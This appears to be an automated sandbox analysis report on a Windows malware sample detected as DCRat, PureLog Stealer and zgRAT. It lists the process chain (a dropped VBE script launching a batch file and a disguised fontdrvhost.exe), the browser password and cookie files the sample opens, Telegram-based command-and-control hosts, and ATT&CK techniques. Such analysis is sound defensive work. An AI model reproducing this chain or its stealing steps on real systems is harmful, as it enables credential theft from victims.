                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeAPI call chain: ExitProcess graph end nodegraph_0-23998
                                    Source: C:\Drivers\fontdrvhost.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B9F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B9F838
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00BA7DEE mov eax, dword ptr fs:[00000030h]0_2_00BA7DEE
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00BAC030 GetProcessHeap,0_2_00BAC030
                                    Source: C:\Drivers\fontdrvhost.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess token adjusted: Debug
                                    Source: C:\Drivers\fontdrvhost.exeProcess token adjusted: Debug
                                    Source: C:\Drivers\fontdrvhost.exeProcess token adjusted: Debug
                                    Source: C:\Drivers\fontdrvhost.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B9F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B9F838
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B9F9D5 SetUnhandledExceptionFilter,0_2_00B9F9D5
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B9FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B9FBCA
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00BA8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BA8EBD
                                    Source: C:\Drivers\fontdrvhost.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Drivers\tovs28pB6Vd1SzaEcRy6OtKi8G4GdEOG4Cet.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Drivers\SE7AQJDJtAMXQraxpdEvOEZ68dJxrB3UY7MvAzdsW8.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Drivers\fontdrvhost.exe "C:\/Drivers/fontdrvhost.exe"Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vK5Z1luEHZ.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Drivers\fontdrvhost.exe "C:\Drivers\fontdrvhost.exe"
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"2","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"5","Cookies Domains (e9db)":"","Passwords Domains (e9db)":""},"5.0.1",5,1,"NEWORK PC","user","138727","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\google\\Update\\1.3.36.312\\Recovery\\GUR2DE8.tmp","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002BA4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,"Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"2","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"5","Cookies Domains (e9db)":"","Passwords Domains (e9db)":""},"5.0.1",5,1,"NEWORK PC","user","138727","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\google\\Update\\1.3.36.312\\Recovery\\GUR2DE8.tmp","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.189","US / United States of America","New York / Ne
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B9F654 cpuid 0_2_00B9F654
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00B9AF0F
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Drivers\fontdrvhost.exe VolumeInformationJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeQueries volume information: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeQueries volume information: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Drivers\fontdrvhost.exe VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Drivers\fontdrvhost.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Drivers\fontdrvhost.exe VolumeInformation
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B9DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00B9DF1E
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B8B146 GetVersionExW,0_2_00B8B146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 5.2.fontdrvhost.exe.128bc1d8.9.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000018.00000002.4579559349.0000000002F9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000018.00000002.4579559349.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000002.2222372567.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 3084, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: AdbXCBUViTnoVBSsOq.exe PID: 7048, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: eP6sjvTqJa.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.eP6sjvTqJa.exe.6c7d6f3.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.eP6sjvTqJa.exe.55ba6f3.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.eP6sjvTqJa.exe.55ba6f3.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.eP6sjvTqJa.exe.6c7d6f3.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.fontdrvhost.exe.150000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.2112514278.000000000556C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000000.2139475451.0000000000152000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2110949935.0000000006C2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\backgroundTaskHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Internet Explorer\en-US\conhost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Drivers\fontdrvhost.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: eP6sjvTqJa.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.eP6sjvTqJa.exe.6c7d6f3.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.eP6sjvTqJa.exe.55ba6f3.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.eP6sjvTqJa.exe.55ba6f3.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.eP6sjvTqJa.exe.6c7d6f3.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.fontdrvhost.exe.150000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\backgroundTaskHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Internet Explorer\en-US\conhost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Drivers\fontdrvhost.exe, type: DROPPED
                                    Tries to harvest and steal browser information (history, passwords, etc)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shmJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shmJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-walJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-walJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 5.2.fontdrvhost.exe.128bc1d8.9.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000018.00000002.4579559349.0000000002F9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000018.00000002.4579559349.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000002.2222372567.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 3084, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: AdbXCBUViTnoVBSsOq.exe PID: 7048, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: eP6sjvTqJa.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.eP6sjvTqJa.exe.6c7d6f3.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.eP6sjvTqJa.exe.55ba6f3.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.eP6sjvTqJa.exe.55ba6f3.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.eP6sjvTqJa.exe.6c7d6f3.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.fontdrvhost.exe.150000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.2112514278.000000000556C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000000.2139475451.0000000000152000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2110949935.0000000006C2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\backgroundTaskHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Internet Explorer\en-US\conhost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Drivers\fontdrvhost.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: eP6sjvTqJa.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.eP6sjvTqJa.exe.6c7d6f3.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.eP6sjvTqJa.exe.55ba6f3.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.eP6sjvTqJa.exe.55ba6f3.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.eP6sjvTqJa.exe.6c7d6f3.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.fontdrvhost.exe.150000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\backgroundTaskHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Internet Explorer\en-US\conhost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Drivers\fontdrvhost.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts11
                                    Windows Management Instrumentation                                    		11
                                    Scripting                                    		1
                                    DLL Side-Loading                                    		1
                                    Disable or Modify Tools                                    		1
                                    OS Credential Dumping                                    		1
                                    System Time Discovery                                    		Remote Services1
                                    Archive Collected Data                                    		1
                                    Web Service                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts1
                                    Native API                                    		1
                                    DLL Side-Loading                                    		12
                                    Process Injection                                    		1
                                    Deobfuscate/Decode Files or Information                                    		LSASS Memory3
                                    File and Directory Discovery                                    		Remote Desktop Protocol1
                                    Data from Local System                                    		1
                                    Ingress Tool Transfer                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts2
                                    Command and Scripting Interpreter                                    		1
                                    Scheduled Task/Job                                    		1
                                    Scheduled Task/Job                                    		3
                                    Obfuscated Files or Information                                    		Security Account Manager137
                                    System Information Discovery                                    		SMB/Windows Admin Shares1
                                    Clipboard Data                                    		11
                                    Encrypted Channel                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal Accounts1
                                    Scheduled Task/Job                                    		Login HookLogin Hook13
                                    Software Packing                                    		NTDS221
                                    Security Software Discovery                                    		Distributed Component Object ModelInput Capture3
                                    Non-Application Layer Protocol                                    		Traffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    DLL Side-Loading                                    		LSA Secrets2
                                    Process Discovery                                    		SSHKeylogging14
                                    Application Layer Protocol                                    		Scheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts243
                                    Masquerading                                    		Cached Domain Credentials131
                                    Virtualization/Sandbox Evasion                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
                                    Virtualization/Sandbox Evasion                                    		DCSync1
                                    Application Window Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                                    Process Injection                                    		Proc Filesystem1
                                    Remote System Discovery                                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow11
                                    System Network Configuration Discovery                                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583030 Sample: eP6sjvTqJa.exe Startdate: 01/01/2025 Architecture: WINDOWS Score: 100 71 api.telegram.org 2->71 73 250345cm.renyash.ru 2->73 75 ipinfo.io 2->75 87 Suricata IDS alerts for network traffic 2->87 89 Antivirus detection for URL or domain 2->89 91 Antivirus detection for dropped file 2->91 95 13 other signatures 2->95 11 eP6sjvTqJa.exe 3 7 2->11         started        14 AdbXCBUViTnoVBSsOq.exe 14 42 2->14         started        18 AdbXCBUViTnoVBSsOq.exe 2->18         started        20 2 other processes 2->20 signatures3 93 Uses the Telegram API (likely for C&C communication) 71->93 process4 dnsIp5 51 C:\Drivers\fontdrvhost.exe, PE32 11->51 dropped 53 tovs28pB6Vd1SzaEcRy6OtKi8G4GdEOG4Cet.vbe, data 11->53 dropped 22 wscript.exe 1 11->22         started        81 250345cm.renyash.ru 104.21.38.84, 49735, 49741, 49745 CLOUDFLARENETUS United States 14->81 55 C:\Users\user\Desktop\uNJXqjUH.log, PE32 14->55 dropped 57 C:\Users\user\Desktop\rfCzNWvT.log, PE32 14->57 dropped 59 C:\Users\user\Desktop\rWShinUN.log, PE32 14->59 dropped 61 4 other malicious files 14->61 dropped 107 Tries to harvest and steal browser information (history, passwords, etc) 14->107 file6 signatures7 process8 signatures9 97 Windows Scripting host queries suspicious COM object (likely to drop second stage) 22->97 25 cmd.exe 1 22->25         started        process10 process11 27 fontdrvhost.exe 17 24 25->27         started        32 conhost.exe 25->32         started        dnsIp12 77 api.telegram.org 149.154.167.220, 443, 49712 TELEGRAMRU United Kingdom 27->77 79 ipinfo.io 34.117.59.81, 443, 49710, 49711 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 27->79 63 C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe, PE32 27->63 dropped 65 C:\Users\user\backgroundTaskHost.exe, PE32 27->65 dropped 67 C:\Users\user\Desktop\rFAHquBj.log, PE32 27->67 dropped 69 10 other malicious files 27->69 dropped 99 Antivirus detection for dropped file 27->99 101 Multi AV Scanner detection for dropped file 27->101 103 Detected unpacking (creates a PE file in dynamic memory) 27->103 105 5 other signatures 27->105 34 cmd.exe 27->34         started        37 schtasks.exe 27->37         started        39 schtasks.exe 27->39         started        41 16 other processes 27->41 file13 signatures14 process15 signatures16 83 Uses ping.exe to sleep 34->83 85 Uses ping.exe to check the status of other devices and networks 34->85 43 conhost.exe 34->43         started        45 chcp.com 34->45         started        47 PING.EXE 34->47         started        49 fontdrvhost.exe 34->49         started        process17

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    eP6sjvTqJa.exe60%VirustotalBrowse
                                    eP6sjvTqJa.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    eP6sjvTqJa.exe100%AviraVBS/Runner.VPG
                                    eP6sjvTqJa.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Users\user\AppData\Local\Temp\vK5Z1luEHZ.bat100%AviraBAT/Delbat.C
                                    C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\backgroundTaskHost.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\PjHeJXVW.log100%AviraTR/AVI.Agent.updqb
                                    C:\Drivers\fontdrvhost.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files\Internet Explorer\en-US\conhost.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\lNXiOOwv.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Drivers\tovs28pB6Vd1SzaEcRy6OtKi8G4GdEOG4Cet.vbe100%AviraVBS/Runner.VPG
